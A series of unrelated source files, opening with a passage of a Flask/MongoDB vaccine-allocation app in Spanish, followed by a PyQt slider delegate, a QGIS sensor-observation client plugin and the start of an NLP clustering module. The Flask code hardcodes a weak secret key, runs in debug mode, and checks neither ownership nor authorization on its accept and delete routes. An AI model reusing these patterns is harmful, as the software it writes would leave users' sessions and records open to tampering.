#return 'You are logged in as hospital ' + session['username']
return render_template('index_hospital.html')
#/home url, muestra /home_hospital.html
@app.route('/home_hospital')
def home_hospital():
reparto_collection=mongo.db.Reparto
users = mongo.db.Gobierno
hospital = mongo.db.Hospital
reparto = mongo.db.Reparto
existing_hospital = hospital.find_one({'Username':session['username']})
existing_user = users.find_one({'Username':session['username']})
reparto = reparto_collection.find({'id_Hospital':existing_hospital['_id']})
return 'You are logged in as hospital ' + session['username']+render_template('accept_reparto.html',reparto=reparto,hospital=existing_hospital)
#When you press login
@app.route('/login_hospital',methods=['POST'])
def login_hospital():
users=mongo.db.Hospital
login_user = users.find_one({'Username': request.form['username']})
#If the user exists
if login_user:
#Compare the encripted password
if bcrypt.hashpw(request.form['pass'].encode('utf-8'),login_user['Password'].encode('utf-8'))== login_user['Password'].encode('utf-8'):
session['username']=request.form['username']
r.setex("prueba", 120, request.form['username'])
return redirect(url_for('index_hospital'))
return 'Invalid username/password combination for hospital'
return 'Invalid username/password combination for hospital'
@app.route('/register_hospital', methods=['POST','GET'])
def register_hospital():
if request.method=='POST':
#Check if it is registered already
users = mongo.db.Hospital
#The 'username appears in the register.html. Pass username and look in database for name
#'Username' referse to the name column in databae, may need to change that
existing_user = users.find_one({'Username':request.form['username']})
#Check if the user does not exist and register it
if existing_user is None:
#Hash the password
hashpass = bcrypt.hashpw(request.form['pass'].encode('utf-8'), bcrypt.gensalt())
#Encuentra al gobierno correspondiente al hospital basado en en nombre del municipio
gobierno=mongo.db.Gobierno
gobierno_municipal = gobierno.find_one({'Municipio': request.form['municipio']})
if gobierno_municipal:
hosptial = mongo.db.Hospital
#Insert in name username, and password the hash password
#Since the password is hashed, it becomes a byte object, we need to transform it to string, therefore we decode it
users.insert({'Nombre': request.form['hospital'], 'Username':request.form['username'], 'Password': <PASSWORD>.decode('utf-8'),'Edad_minima':65,'Vacunas_disponibles':0, 'Vacunas_utilizadas':0, 'Vacunas_apartadas': 0,'id_municipal':gobierno_municipal['_id']})
session['username_hospital']=request.form['username']
r.setex("prueba", 120, request.form['username'])
return redirect(url_for('index_hospital'))
return 'No existe ese municipio'
#return 'No existe ese gobierno municipal!'
#Existing user was not none
return 'That username already exists!'
return render_template('register_hospital.html')
###FinHospitales###
###Users###
@app.route('/register_user', methods=['POST', 'GET'])
def register_user():
if request.method == 'POST':
users = mongo.db.User
hospital=mongo.db.Hospital
nombhosp = hospital.find_one({'Nombre': request.form['Hospital']})
existing_user = users.find_one({'CURP':request.form['CURP']})
if nombhosp != None and existing_user == None:
testedad = request.form['Edad']
testedad = int(testedad)
if testedad >= nombhosp["Edad_minima"] :
if nombhosp["Vacunas_disponibles"] > 0:
users.insert({'CURP':request.form['CURP'], 'Edad':request.form['Edad'], 'Hospital': request.form['Hospital'], 'Vacunado':'S'})
nombhosp['Vacunas_apartadas']= nombhosp['Vacunas_apartadas']+1
nombhosp['Vacunas_disponibles']= nombhosp['Vacunas_disponibles']-1
hospital.save(nombhosp)
return 'updated hospital y created user'
return 'Ya no quedan vacunas en este hospital'
return 'Por el momento no estamos vacunando a las personas de su edad'
return f'<h1>El usuario ya existe o el hospital no existe </h1>'
return render_template('register_user.html')
#End of frontend login
##############################################################################
###Creacion de repartos###
@app.route('/register_reparto',methods=['POST','GET'])
def register_reparto():
if request.method=='POST':
#Check if it is registered already
users = mongo.db.Gobierno
hospital = mongo.db.Hospital
reparto = mongo.db.Reparto
existing_hospital = hospital.find_one({'Nombre':request.form['hospital']})
existing_user = users.find_one({'Username':session['username']})
vacunas_string =request.form['vacunas']
#DELETE reparto.insert({'id_Hospital': 0, 'Vacunas':request.form['vacunas'], 'id_Municipal': 0,'estado': 'enviado'})
#Check if the user does not exist and register it
if existing_hospital:
lol = r.get("prueba")
if lol == None:
return "sesion timeout" + render_template("index.html")
reparto.insert({'id_Hospital': existing_hospital['_id'], 'Vacunas':request.form['vacunas'], 'id_Municipal': existing_user['_id'],'estado': 'enviado'})
#reparto.insert({'id_Hospital': existing_hospital['_id'], 'Vacunas':request.form['vacunas'], 'id_Municipal': session['id'],'estado': 'enviado'})
#DELETE session['username']=request.form['username']
return redirect(url_for('index'))
return 'NO EXISTE HOSPITAL'
return render_template('register_reparto.html')
###Fin creacion de repartos###
@app.route('/accept_reparto/<oid>',methods=['POST','GET'])
def accept_reparto(oid):
lol = r.get("prueba")
if lol == None:
return "sesion timeout" + render_template("index_hospital.html")
reparto_collection = mongo.db.Reparto
hospital_collection = mongo.db.Hospital
reparto=reparto_collection.find_one({'_id':ObjectId(oid)})
current_hospital = hospital_collection.find_one({'Username':session['username']})
reparto['estado']="aceptado"
current_hospital['Vacunas_disponibles']= current_hospital['Vacunas_disponibles']+int(reparto['Vacunas'])
reparto_collection.save(reparto)
hospital_collection.save(current_hospital)
return redirect(url_for('home_hospital'))
#TO DO
@app.route('/main_vacunados')
def main_vacunados():
lol = r.get("prueba")
if lol == None:
return "sesion timeout" + render_template("index_hospital.html")
users = mongo.db.User
hospital = mongo.db.Hospital
current_hospital = hospital.find_one({'Username':session['username']})
user = users.find({'Hospital':current_hospital['Nombre']})
return 'You are logged in as hospital ' + session['username']+render_template('main_vacunados.html',user=user,hospital=current_hospital)
#TO DO
@app.route('/accept_vacunados/<oid>',methods=['POST','GET'])
def accept_vacunados(oid):
lol = r.get("prueba")
if lol == None:
return "sesion timeout" + render_template("index_hospital.html")
user_collection = mongo.db.User
hospital_collection = mongo.db.Hospital
user=user_collection.find_one({'_id':ObjectId(oid)})
current_hospital = hospital_collection.find_one({'Username':session['username']})
user['Vacunado']='V'
current_hospital['Vacunas_apartadas']= current_hospital['Vacunas_apartadas']-1
current_hospital['Vacunas_utilizadas']= current_hospital['Vacunas_utilizadas']+1
user_collection.save(user)
hospital_collection.save(current_hospital)
return redirect(url_for('main_vacunados'))
@app.route('/delete_vacunados/<oid>',methods=['POST','GET'])
def delete_vacunados(oid):
lol = r.get("prueba")
if lol == None:
return "sesion timeout" + render_template("index_hospital.html")
user_collection = mongo.db.User
hospital_collection = mongo.db.Hospital
user=user_collection.find_one({'_id':ObjectId(oid)})
current_hospital = hospital_collection.find_one({'Username':session['username']})
current_hospital['Vacunas_apartadas']= current_hospital['Vacunas_apartadas']-1
current_hospital['Vacunas_disponibles']= current_hospital['Vacunas_disponibles']+1
user_collection.delete_one(user)
hospital_collection.save(current_hospital)
return redirect(url_for('main_vacunados'))
#SecretKey
if __name__=='__main__':
app.secret_key='secretivekey'
app.run(debug=True)
@app.route('/inicio')
def inicio():
return render_template('inicio.html') |
<gh_stars>0
# This code is licensed under the MIT License (see LICENSE file for details)
from PyQt5 import Qt
class SliderDelegate(Qt.QStyledItemDelegate):
def __init__(self, min_value, max_value, parent=None):
super().__init__(parent)
self.min_value = min_value
self.max_value = max_value
self.style = Qt.QStyleFactory.create('fusion')
self._drag_grabber = None
def sizeHint(self, option, midx):
return Qt.QSize(100,10)
def paint(self, painter, option, midx):
self.style.drawPrimitive(Qt.QStyle.PE_PanelItemViewItem, option, painter, option.widget)
if not midx.isValid():
return
d = midx.data()
if isinstance(d, Qt.QVariant):
d = d.value()
slider = Qt.QStyleOptionSlider()
slider.minimum, slider.maximum = 0, 100
slider.sliderPosition = int( (d-self.min_value)/(self.max_value-self.min_value) * 100.0 )
slider.rect = option.rect
self.style.drawComplexControl(Qt.QStyle.CC_Slider, slider, painter)
def createEditor(self, parent, option, index):
return None
def editorEvent(self, event, model, option, midx):
if not midx.isValid() or not event.type() == Qt.QEvent.MouseButtonPress or event.buttons() != Qt.Qt.LeftButton:
return False
if self._drag_grabber is not None:
self._drag_grabber.deleteLater()
offset = option.widget.viewport().geometry().topLeft()
rect = Qt.QRect(
option.rect.left() + offset.x(),
option.rect.top() + offset.y(),
option.rect.size().width(),
option.rect.size().height())
self._drag_grabber = DragGrabber(option.widget, model, rect, midx)
self._drag_grabber.destroyed.connect(self.on_drag_grabber_destroyed)
self._drag_grabber.drag_x_changed.connect(self.on_drag_x_changed)
return self.on_drag_x_changed(event.localPos().x(), option.rect, model, midx)
def on_drag_x_changed(self, x, r, model, midx):
sl, sw = r.left(), r.width()
v = ((x - sl) / sw) * (self.max_value - self.min_value) + self.min_value
if v < self.min_value:
v = self.min_value
elif v > self.max_value:
v = self.max_value
return model.setData(midx, Qt.QVariant(v), Qt.Qt.EditRole)
def on_drag_grabber_destroyed(self):
self._drag_grabber = None
class DragGrabber(Qt.QWidget):
drag_x_changed = Qt.pyqtSignal(int, Qt.QRect, Qt.QAbstractItemModel, Qt.QModelIndex)
def __init__(self, parent, model, rect, midx):
super().__init__(parent)
self._ignore_next_no_button_mouse_move_event = True
self.model = model
self.midx = midx
self.setMouseTracking(True)
# DragGrabber exactly covers the cell it manipulates, so it must be transparent (or simply
# not paint its background in the first place) in order for the slider to be visible
# while it is dragged.
self.setAutoFillBackground(False)
self.setGeometry(rect)
self.show()
self.grabMouse()
def mouseReleaseEvent(self, event):
event.accept()
self.releaseMouse()
self.deleteLater()
def mouseMoveEvent(self, event):
event.accept()
if event.buttons() != Qt.Qt.LeftButton:
if event.buttons() == Qt.Qt.NoButton and self._ignore_next_no_button_mouse_move_event:
# In the definition of QApplicationPrivate::sendSyntheticEnterLeave(..), line 2788 of
# qtbase-opensource-src-5.4.2/src/widgets/kernel/qapplication.cpp, is called when
# widget visibility changes, including as a result of the widget's first .show() call.
#
# The last two lines of sendSyntheticEnterLeave(..):
# QMouseEvent e(QEvent::MouseMove, pos, windowPos, globalPos, Qt::NoButton, Qt::NoButton, Qt::NoModifier);
# sendMouseEvent(widgetUnderCursor, &e, widgetUnderCursor, tlw, &qt_button_down, qt_last_mouse_receiver);
#
# So, even though sendSyntheticEnterLeave may be being called because a widget was shown
# in response to a mouse click, the first mouse event the newly created widget will receive
# if a number of conditions are met, and they are in this case, is the synthetic move event
# with flags set to indicate that it occurred with no mouse buttons depressed. We consider
# dragging to have ended when the left mouse button is released, and so we must ignore this
# synthetic event if our DragGrabber is to exist for more than one event loop iteration.
self._ignore_next_no_button_mouse_move_event = False
else:
self.releaseMouse()
self.deleteLater()
else:
self.drag_x_changed.emit(event.x(), self.rect(), self.model, self.midx)
def focusOutEvent(self, event):
self.releaseMouse()
self.deleteLater()
|
<filename>ui/mainwindow_dialog.py
# -*- coding: utf-8 -*-
# =============================================================================
# Copyright (c) ARMINES / MINES ParisTech
# Created by <NAME> <<EMAIL>>
#
# this file is available under the BSD 3-clause License
# (https://opensource.org/licenses/BSD-3-Clause)
# =============================================================================
import traceback
import os
from PyQt4 import QtGui, QtCore, uic
import requests
import datetime
from qgis.core import *
import qgis.utils
from owslib.sos import SensorObservationService
from gui import CalendarWindow
from ..sos import WGS84conversion, getCapabilitiesSOS200, getSeriesSOS200
from ..sos import GetOfferingsList
from ..features import plotSeries, arraySeries, exportSeries
# Logs
import logging
# Create log for OWSLib package
owslib_log = logging.getLogger('owslib')
# Add formatting and handlers as needed
owslib_log.setLevel(logging.DEBUG)
logging.basicConfig(level=logging.DEBUG)
# Create log for requests package
requests_log = logging.getLogger("requests.packages.urllib3")
requests_log.setLevel(logging.DEBUG)
requests_log.propagate = True
def resolve(name, basepath=None):
"""
Resolve path to a file relative to the plugin given its name.
argument:
>>> name:
File name (string) containing its type.
"""
if not basepath:
basepath = os.path.dirname(os.path.realpath(__file__))
return os.path.join(basepath, name)
MainWindowForm, _ = uic.loadUiType(os.path.join(
os.path.dirname(__file__), 'mainwindow.ui'))
class MainWindowDialog(QtGui.QMainWindow, MainWindowForm):
"""
Create main window - called by the "run" method in the plugin main class -
with its features.
"""
def __init__(self, parent=None):
"""Constructor."""
super(MainWindowDialog, self).__init__(parent)
# Set up the user interface from Designer.
# After setupUI you can access any designer object by doing
# self.<objectname>, and you can use autoconnect slots - see
# http://qt-project.org/doc/qt-4.8/designer-using-a-ui-file.html
# #widgets-and-dialogs-with-auto-connect
self.setupUi(self)
self.initUI()
# Time series attributes.
self.dates = []
self.values = []
# SOS related attributes.
self.sos_service_url = ''
self.getcap_response = '' # GetCapabilities response.
self.WGS84bbox_set = set() # Set which will contain the
# bounding box of each station and thus
# the identifier of each station as the
# spatial information is used to select
# the station here.
self.WGS84bbox_list = []
self.selected_station_index = 0
self.offering = ''
self.observedproperty = ''
self.unit = ''
self.getobs_response = '' # GetObservation response.
# QGIS related attributes.
#
# Initialize station layer.
self.stations_layer = QgsVectorLayer("Point?crs=epsg:4326",
"Features of interest", "memory")
# Define "myint" attribute to store the id of the stations.
self.stations_layer.dataProvider().addAttributes(
[QgsField('myint', QtCore.QVariant.Int)]
)
self.stations_layer.updateFields()
# Set the symbol used to visualize stations.
self.station_symbol_layer = QgsSvgMarkerSymbolLayerV2(size=10)
self.filepath = resolve('ic_place_black_48px.svg')
self.station_symbol_layer.setPath(self.filepath)
self.stations_layer.rendererV2().symbols()[0].changeSymbolLayer(
0, self.station_symbol_layer)
# Fill OfferingComboBox with all offerings of the newly selected
# station from "Features of interest" vector layer - spatially
# selected in QGIS - each time the layer selection changes.
self.stations_layer.selectionChanged.connect(self.fillOfferingComboBox)
# Initialize calendars used to select time series starting-
# and ending time.
self.start_calendar = CalendarWindow()
self.start_calendar.setWindowTitle("Starting Time Selection")
self.ending_calendar = CalendarWindow()
self.ending_calendar.setWindowTitle("Ending Time Selection")
# Initialize boolean to indicate if a time series has already been
# successfully retrieved, so that no additional GetObservation request
# is sent when, for instance, exporting time series after having
# plotted it.
self.getseries_boolean = False
def resetGetSeriesBoolean(self):
self.getseries_boolean = False
def initUI(self):
self.setWindowTitle('SOS Client')
self.statusBar = QtGui.QStatusBar()
self.setStatusBar(self.statusBar)
# Initialize first block of main window (SOS 2.0 server selection and
# general server information retrieval) related attributes and signals
# and slots connection management.
self.select_sos_server_pushButton.clicked.connect(
self.showServerSelectionDialog)
self.get_server_informaton_pushButton.clicked.connect(
self.getServerInformation)
# Initialize second block of main window (GetObservation request
# parameters selection) related attributes and signals and slots
# connection management.
self.select_offering_comboBox.currentIndexChanged.connect(
self.fillObservedPropertiesComboBox)
self.select_offering_comboBox.currentIndexChanged.connect(
self.resetGetSeriesBoolean)
self.starting_time_pushButton.clicked.connect(self.showStartCalendar)
self.ending_time_pushButton.clicked.connect(self.showEndingCalendar)
# Initialize third block of main window (plugin functionnalities,
# plot time series, visualize it in tabular format, export it)
# related attributes and signals and slots connection management.
self.plot_pushButton.clicked.connect(self.plotTimeSeries)
self.table_view_pushButton.clicked.connect(self.arrayTimeSeries)
self.export_as_csv_pushButton.clicked.connect(self.exportTimeSeries)
##########################################################################
####### First block of main window related functions.
####### SOS 2.0 server selection and general server information retrieval
##########################################################################
def showServerSelectionDialog(self):
text, ok = QtGui.QInputDialog.getText(self, 'SOS server selection',
'Enter sos service url:')
if ok :
# Reset attributes.
#
# Reset UI attributes.
self.statusBar.clearMessage()
# Second block of main window attributes.
self.select_offering_comboBox.clear()
self.select_prop_comboBox.clear()
self.starting_time_pushButton.setText("")
self.ending_time_pushButton.setText("")
self.time_series_starting_time_value.setText("")
self.time_series_ending_time_value.setText("")
# QGIS related attributes.
# Remove station features and get an empty station layer.
listOfIds = [feat.id() for feat in self.stations_layer.getFeatures()]
self.stations_layer.dataProvider().deleteFeatures(listOfIds)
# Other attributes.
self.getobs_response = ''
self.getseries_boolean = False
# Set attributes using retrieved SOS server information.
#
self.sos_service_url = str(text)
self.getcap_response = requests.get(
self.sos_service_url + '?REQUEST=GetCapabilities'
'&SERVICE=SOS&ACCEPTVERSIONS=2.0.0', stream=True)
self.sos = SensorObservationService(
None,xml=self.getcap_response.content, version="2.0.0")
self.WGS84bbox_set=set(WGS84conversion(off) for off in self.sos.offerings)
self.WGS84bbox_list=list(self.WGS84bbox_set)
# Set UI attributes
self.selected_sos_server_lineEdit.setText(self.sos_service_url)
if self.WGS84bbox_list == []:
# Display error message using QMessageBox.
empty_bbox_msg = QtGui.QMessageBox()
empty_bbox_msg.setWindowTitle("Error")
empty_bbox_msg.setTextFormat(QtCore.Qt.RichText)
msg_text = (
'Each offering bounding box is empty when using '
'OWSLib with this SOS 2.0 server'
)
empty_bbox_msg.setText(msg_text)
i_text = (
'This plugin uses the Open Source '
'<a href=\"https://geopython.github.io/OWSLib/\">OWSlib library</a> '
'to retrieve SOS 2.0 data. When collecting offerings '
'and their corresponding featureOfInterest bounding '
'boxes, only empty lists were retrieved.'
)
empty_bbox_msg.setInformativeText(i_text)
d_text = (
'In order to solve the problem, you may want to have '
'a look at OWSlib documentation '
'(https://geopython.github.io/OWSLib/) and at the '
'Python source file '
'(https://github.com/geopython/OWSLib/blob/master/owslib/swe/observation/sos200.py/) '
'containing the offering class, including the '
'bounding box attribute.'
)
empty_bbox_msg.setDetailedText(d_text)
empty_bbox_msg.setIcon(QtGui.QMessageBox.Critical)
empty_bbox_msg.exec_()
# Reload station layer as selected SOS server has changed.
self.stations_layer.triggerRepaint()
elif self.WGS84bbox_list == [None]:
# Display warning message using QMessageBox.
none_bbox_msg = QtGui.QMessageBox()
none_bbox_msg.setWindowTitle("Warning")
none_bbox_msg.setTextFormat(QtCore.Qt.RichText)
msg_text = (
"Each offering has 'None' bounding box when using "
"OWSLib with this SOS 2.0 server. This plugin uses "
"the Open Source "
"<a href=\"https://geopython.github.io/OWSLib/\">OWSlib library</a>"
" to retrieve SOS 2.0 data. When collecting the "
"featureOfInterest bounding box for each offering, "
"only None objects were retrieved. Consequently, "
"no feature of interest could be added to the "
"'Features of interest' layer generated by the plugin."
)
none_bbox_msg.setText(msg_text)
i_text = (
'Please select directly an offering in the "Offering" '
'combobox to unlock the "ObservedPropery" combobox. '
'You will then be able to select all GetObservation '
'request parameters and to retrieve desired '
'time series.'
)
none_bbox_msg.setInformativeText(i_text)
d_text = (
'In order to solve the problem, you may want to have '
'a look at OWSlib documentation '
'(https://geopython.github.io/OWSLib/) and at the '
'Python source file '
'(https://github.com/geopython/OWSLib/blob/master/owslib/swe/observation/sos200.py/) '
'containing the offering class, including the '
'bounding box attribute.'
)
none_bbox_msg.setDetailedText(d_text)
none_bbox_msg.setIcon(QtGui.QMessageBox.Warning)
none_bbox_msg.exec_()
# Reload station layer as selected SOS server has changed.
self.stations_layer.triggerRepaint()
# Fill OfferingComboBox with all offerings from stations
# which have None bbox.
self.selected_station_index = 0
station = self.WGS84bbox_list[self.selected_station_index]
for o in GetOfferingsList(self.sos, station).offering_list:
self.select_offering_comboBox.addItem(o.id)
else:
# Stations bbox content is valid.
#
# For each station...
for i, s in enumerate(self.WGS84bbox_list):
# Define pairs of coordinates of two points which
# generate the bounding box of this stations.
if s is not None:
xmin = min(s[1], s[3])
xmax = max(s[1], s[3])
ymin = min(s[0], s[2])
ymax = max(s[0], s[2])
# Create new point which represents the station.
# Here, we choose to set station location using the point
# which has min lat and min long, as several SOS 2.0
# we have tested lead to two points coinciding.
# Therefore, we make the assumption xmin==xmax and
# ymin==ymax.
# When it is not the case, station location is likely
# to be incorrect.
# Further development is required to solve this issue.
new_feature = QgsFeature()
new_feature.setGeometry(QgsGeometry.fromPoint(
QgsPoint(xmin, ymin)))
new_feature.setAttributes([i])
self.stations_layer.dataProvider().addFeatures(
[new_feature])
# Update layer and refresh QGIS canvas extent.
self.stations_layer.updateExtents()
QgsMapLayerRegistry.instance().addMapLayer(self.stations_layer)
self.stations_layer.triggerRepaint()
canvas = qgis.utils.iface.mapCanvas()
canvas.setExtent(self.stations_layer.extent())
# Inform user he/she has to spatially select a station from
# newly added 'Features of interest' layer.
foi_layer_msg = QtGui.QMessageBox()
foi_layer_msg.setWindowTitle("Information")
msg_text = (
'A "Features of interest" layer has been added to the map!')
foi_layer_msg.setText(msg_text)
i_text = (
'Please select a station of the "Features of interest" '
'layer using the select features tool of the QGIS '
'toolbar to unlock the "Offering" combobox and the '
'"ObservedPropery" combobox. You will then be able to '
'select all GetObservation request parameters and to '
'retrieve desired time series.'
)
foi_layer_msg.setInformativeText(i_text)
foi_layer_msg.setIcon(QtGui.QMessageBox.Information)
foi_layer_msg.exec_()
def getServerInformation(self):
if self.sos_service_url != '' and self.sos_service_url is not None:
getCapabilitiesSOS200(self.getcap_response)
else:
QtGui.QMessageBox.critical(
self, "Critical error",
'SOS server has not been selected. Please select one '
'using the "Select SOS 2.0 server" button above.'
)
##########################################################################
####### Second block of main window related functions.
####### GetObservation request parameters selection.
##########################################################################
def fillOfferingComboBox(self):
# Reset attributes.
#
# Reset UI attributes.
self.statusBar.clearMessage()
self.select_offering_comboBox.clear()
self.select_prop_comboBox.clear()
self.time_series_starting_time_value.setText("")
self.time_series_ending_time_value.setText("")
self.starting_time_pushButton.setText("")
self.ending_time_pushButton.setText("")
# Get selected station.
features_list = self.stations_layer.selectedFeatures()
try:
feat = features_list[0]
self.selected_station_index = feat['myint'] # selected station
# is identified by an
# index which is stored
# as "myint" attribute
# value of selected
# feature of 'Features
# of interest' layer
station = self.WGS84bbox_list[self.selected_station_index]
for o in GetOfferingsList(self.sos, station).offering_list:
self.select_offering_comboBox.addItem(o.id)
except IndexError:
pass
def fillObservedPropertiesComboBox(self):
# Reset attributes.
#
# Reset UI attributes.
self.statusBar.clearMessage()
self.select_prop_comboBox.clear()
# Fill observed properties combo box.
station = self.WGS84bbox_list[self.selected_station_index]
off = (
GetOfferingsList(self.sos, station)
.offering_list[self.select_offering_comboBox.currentIndex()]
)
for p in off.observed_properties:
self.select_prop_comboBox.addItem(p)
# Set UI attributes related to selected offering, as it has changed.
#
# Set a minimum and a maximum date so that the calendar used to select
# time series starting time prevents user from selecting a date earlier
# than the begin position of the selected offering or later than its
# end position.
self.start_calendar.cal.setMinimumDate(
QtCore.QDateTime(off.begin_position).date()
)
self.start_calendar.cal.setMaximumDate(
QtCore.QDateTime(off.end_position).date()
)
# Set a maximum date so that the calendar used to select time series
# ending time preventts user from selecting a date later than the
# end position of the selected offering.
#
# Later, a minimum date will be set according to the starting date
# selected by the user.
self.ending_calendar.cal.setMaximumDate(
QtCore.QDateTime(off.end_position).date()
)
# Default time period is set to 2 days to prevent user from waiting
# a very long time for the GetObservation response retrieval.
self.start_calendar.cal.setSelectedDate(
QtCore.QDateTime(off.end_position - datetime.timedelta(days=2))
.date()
)
# Default ending time is set according to end position of selected
# offering.
self.ending_calendar.cal.setSelectedDate(
QtCore.QDateTime(off.end_position).date()
)
# Update UI attributes text to inform user of every change.
self.starting_time_pushButton.setText(
self.start_calendar.cal.selectedDate().toString()
)
self.ending_time_pushButton.setText(
self.ending_calendar.cal.selectedDate().toString()
)
self.time_series_starting_time_value.setText(
QtCore.QDateTime(off.begin_position).date().toString()
)
self.time_series_ending_time_value.setText(
QtCore.QDateTime(off.end_position).date().toString()
)
# Create several functions to get a dynamic time management in both
# starting time and ending time selection calendars.
def showStartCalendar(self):
self.start_calendar.show()
self.start_calendar.cal.clicked.connect(self.changeStartingTimeButtonText)
self.start_calendar.cal.clicked.connect(self.closeStartCalendar)
self.start_calendar.cal.clicked.connect(self.changeEndingCalendarMinimumDate)
def changeStartingTimeButtonText(self, date):
self.starting_time_pushButton.setText(date.toString())
self.getseries_boolean = False
def closeStartCalendar(self):
self.start_calendar.hide()
def changeEndingCalendarMinimumDate(self, date):
self.ending_calendar.cal.setMinimumDate(date.addDays(1))
def showEndingCalendar(self):
self.ending_calendar.show()
self.ending_calendar.cal.clicked.connect(self.changeEndingTimeButtonText)
self.ending_calendar.cal.clicked.connect(self.closeEndingCalendar)
def changeEndingTimeButtonText(self, date):
self.ending_time_pushButton.setText(date.toString())
self.getseries_boolean = False
def closeEndingCalendar(self):
self.ending_calendar.hide()
##########################################################################
####### Third block of main window related functions.
####### Plugin functionnalities:
####### Display time series in tabular, plot time series,
####### export time series.
##########################################################################
def getObservation(self, *args):
starting_time = QtCore.QDateTime(
self.start_calendar.cal.selectedDate()).toPyDateTime()
ending_time = QtCore.QDateTime(
self.ending_calendar.cal.selectedDate()).toPyDateTime()
try:
self.statusBar.showMessage('Request in progress')
if len(args)==1: # Check if user has asked for a timeout.
(self.dates,
self.values,
self.offering,
self.observedproperty,
self.unit,
self.getobs_response) = getSeriesSOS200(
self.sos,
self.selected_station_index,
self.select_offering_comboBox.currentIndex(),
self.select_prop_comboBox.currentIndex(),
starting_time,
ending_time,
timeout=args[0])
else:
(self.dates,
self.values,
self.offering,
self.observedproperty,
self.unit,
self.getobs_response) = getSeriesSOS200(
self.sos,
self.selected_station_index,
self.select_offering_comboBox.currentIndex(),
self.select_prop_comboBox.currentIndex(),
starting_time,
ending_time)
self.getseries_boolean = True # From now on a time series has
# already been successfully
# retrieved.
except requests.exceptions.Timeout:
# Inform user timeout has elapsed.
self.getobs_response = ''
QtGui.QMessageBox.critical(
self, "Timeout error",
"The timeout has expired. Please change it and try again."
)
self.statusBar.showMessage(
'Failed to retrieve time series as timeout has expired')
except:
# Inform user that an error occured and print traceback.
error_traceback = traceback.format_exc()
getobs_error_msg = QtGui.QMessageBox()
getobs_error_msg.setWindowTitle("Error")
getobs_error_msg.setTextFormat(QtCore.Qt.RichText)
getobs_error_msg.setText(
'Unexpected GetObservation request error. Something went '
'wrong when we asked this SOS 2.0 server for the '
'GetObservation response. Please make sure this '
'GetObservation request leads to a working response from '
'a browser.'
)
getobs_error_msg.setInformativeText(
'This plugin uses the Open Source '
'<a href=\"https://geopython.github.io/OWSLib/\">'
'OWSlib library</a> to retrieve SOS 2.0 data. In order '
'to fix this error, you might want to take a look at the '
'Python Error traceback below.'
)
getobs_error_msg.setDetailedText(error_traceback)
getobs_error_msg.setIcon(QtGui.QMessageBox.Critical)
getobs_error_msg.exec_()
self.statusBar.showMessage(
'Failed to retrieve time series for unexpected error')
def getTimeSeries(self):
# Prepare for GetObservation response retrieval step.
self.statusBar.clearMessage()
# Reset attributes.
self.dates = []
self.values = []
self.offering = ''
self.observedproperty = ''
self.getobs_response = ''
ending_time = QtCore.QDateTime(
self.ending_calendar.cal.selectedDate()).toPyDateTime()
starting_time = QtCore.QDateTime(
self.start_calendar.cal.selectedDate()).toPyDateTime()
# GetObservation response retrieval step.
#
# Ask user if he/she wants to set a timeout value, as getting a
# response to a GetObservation request can take a long time.
timeout_value = None
timeout_option = QtGui.QMessageBox.question(
self, "Timeout option",
"Parsing the response from a SOS GetObservation request can "
"be very long. Would you like to set a request timeout?",
QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.Yes
)
if timeout_option == QtGui.QMessageBox.Yes:
# If user says "Yes", create a dialog window and retrieve input
# timeout value.
timeout_value, ok = QtGui.QInputDialog.getInt(
self, "Timeout value selection",
"Please enter a timeout value in seconds (integer):",
value=60, min=0, max=7200
)
timeout_value = abs(timeout_value)
if ok:
# Launch GetObservation request with timeout_value as
# additional argument.
self.getObservation(timeout_value)
elif (ending_time - starting_time > datetime.timedelta(days=3)):
# If time period is longer than 3 days, inform user time series
# retrieval may take some time.
QtGui.QMessageBox.information(
self, "Information",
"Time series retrieval may take some time"
)
# Launch GetObservation request with no additional arguments.
self.getObservation()
else:
self.getObservation()
# GetObservation response retrieval step is over.
# Inform user about it, and about recognized errors if needed.
#
# Recognized errors.
if self.dates == []:
# Inform user that date and time column of retrieved time series
# is empty.
empty_dates_msgbox = QtGui.QMessageBox()
empty_dates_msgbox.setWindowTitle("Empty dates list warning")
empty_dates_msgbox.setText(
"WARNING: retrieval of time series time data failed! "
"Please make sure this GetObservation request leads to a "
"working response from a browser, and retry."
)
empty_dates_msgbox.setInformativeText(
"You might want to take a look at the request XML "
"reponse below!"
)
if not self.getobs_response:
empty_dates_msgbox.setDetailedText(
"Empty GetObservation response")
else:
empty_dates_msgbox.setDetailedText(self.getobs_response)
empty_dates_msgbox.setIcon(QtGui.QMessageBox.Warning)
empty_dates_msgbox.exec_()
elif self.values == []:
empty_values_msgbox = QtGui.QMessageBox()
empty_values_msgbox.setWindowTitle(
"Empty observations results values list warning")
empty_values_msgbox.setText(
"WARNING: retrieval of time series y-axis data failed. "
"Please make sure this GetObservation request leads to a "
"working response from a browser, and retry."
)
empty_values_msgbox.setInformativeText(
"You might want to take a look at the request XML "
"reponse below!"
)
if not self.getobs_response:
empty_dates_msgbox.setDetailedText(
"Empty GetObservation response")
else:
empty_dates_msgbox.setDetailedText(self.getobs_response)
empty_values_msgbox.setIcon(QtGui.QMessageBox.Warning)
empty_values_msgbox.exec_()
else: # No error occured.
QtGui.QMessageBox.information(
self, "Information",
"Time series retrieval is finished"
)
self.statusBar.clearMessage()
self.statusBar.showMessage('Time series retrieval process is over')
def arrayTimeSeries(self):
if not self.getseries_boolean:
# Time series has not been retrieved yet.
# Reset GetObservation response attribute.
self.getobs_response = ''
self.getTimeSeries()
arraySeries(self.dates, self.values, self.observedproperty, self.unit)
def plotTimeSeries(self):
if not self.getseries_boolean:
# Time series has not been retrieved yet.
# Reset GetObservation response attribute.
self.getobs_response = ''
self.getTimeSeries()
plotSeries(self.dates, self.values, self.observedproperty, self.unit)
def exportTimeSeries(self):
if not self.getseries_boolean:
# Time series has not been retrieved yet.
# Reset GetObservation response attribute.
self.getobs_response = ''
self.getTimeSeries()
# Get path for export from QFileDialog.
path = QtGui.QFileDialog.getSaveFileName(
self, 'Export Time Series', self.offering + ".csv", '*.csv')
exportSeries(
self.dates, self.values, self.observedproperty, self.unit, path)
|
<reponame>btaguinod/purple-politics<gh_stars>1-10
import numpy as np
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import string
import math
from datetime import datetime
from article import Article
from event import Event
nltk.download('stopwords')
nltk.download('punkt')
class NLPArticle:
"""Article Container with vector for similarity comparisons.
Attributes:
article (Article): Article object.
vector (numpy.ndarray): Numpy vector representation.
"""
def __init__(self, article: Article):
self.article = article
self.vector = None
def set_tf_vector(self, index: list[str]) -> list[str]:
